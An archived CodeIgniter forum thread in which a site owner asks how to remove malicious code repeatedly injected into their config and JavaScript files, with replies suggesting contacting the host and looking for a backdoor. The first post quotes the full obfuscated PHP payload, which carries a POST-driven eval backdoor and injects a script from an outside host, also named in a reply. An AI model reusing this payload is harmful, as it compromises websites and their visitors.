Welcome Guest, Not a member yet? Register   Sign In
CodeIgniter Forums Archived Discussions Archived Development & Programming how remove virus on my website
how remove virus on my website
  • El Forum
    Guest
  •  
#1
11-01-2009, 09:06 PM

[eluser]minhbu[/eluser]
now my website is being attacked by virus.Sometimes it append this source on top file config.php,database.php in folder system/application/config
Code:
<?php eval(base64_decode('aWYoIWlzc2V0KCRmOXhuNDEpKXtmdW5jdGlvbiBmOXhuNCgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJoaGJtNWhZbUZ5WW1WeVlTNWpiMjB1WW5JdmMyTjFZbWxrZFM4eE1HMWhhWE11Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIGY5eG40MigkYSwkYiwkYywkZCl7Z2xvYmFsICRmOXhuNDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGY5eG40MSkpY2FsbF91c2VyX2Z1bmMoJGY5eG40MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdmOXhuNCcpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdmOXhuNCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRmOXhuNGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2Y5eG40MicpKSE9J2Y5eG40MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>
and file js it append this source into bottom file
Code:
document. write(' [removed]<\/ script>');
although i was chmod all files to 444 but virus chmoded all to 644 and appended sources into my files
how to delete virus or anti them?
i deleted index.html,index.php,default.php files
  • El Forum
    Guest
  •  
#2
11-01-2009, 09:16 PM

[eluser]Ben Edmunds[/eluser]
Do you manage the web server?

What OS?
  • El Forum
    Guest
  •  
#3
11-01-2009, 09:30 PM

[eluser]minhbu[/eluser]
no i `m coding and manage this website. i can`t intervention in the server.
kernel is 2.6.18-128.1.16.e l5PAE
i use linux
  • El Forum
    Guest
  •  
#4
11-01-2009, 09:31 PM

[eluser]Ben Edmunds[/eluser]
If it really is a virus you must contact the hosting provider.
  • El Forum
    Guest
  •  
#5
11-01-2009, 09:58 PM

[eluser]minhbu[/eluser]
i was contact the hosting provicer but they was scan my hosting but they say haven`t virus on my hosting
  • El Forum
    Guest
  •  
#6
11-01-2009, 10:37 PM

[eluser]Unknown[/eluser]
script sending request to
Code:
http://hannabarbera.com.br/scubidu/10mais.php

base64 decode into text based Smile
  • El Forum
    Guest
  •  
#7
11-02-2009, 12:37 AM

[eluser]umefarooq[/eluser]
its not virus your site is got attacked by some body because last days one of my client site was also attacked, check your ftp directory and check the modified date of you directory and file may be there is some backdoor in hosting or code let attacker in your site.




Theme © iAndrew 2016 - Forum software by © MyBB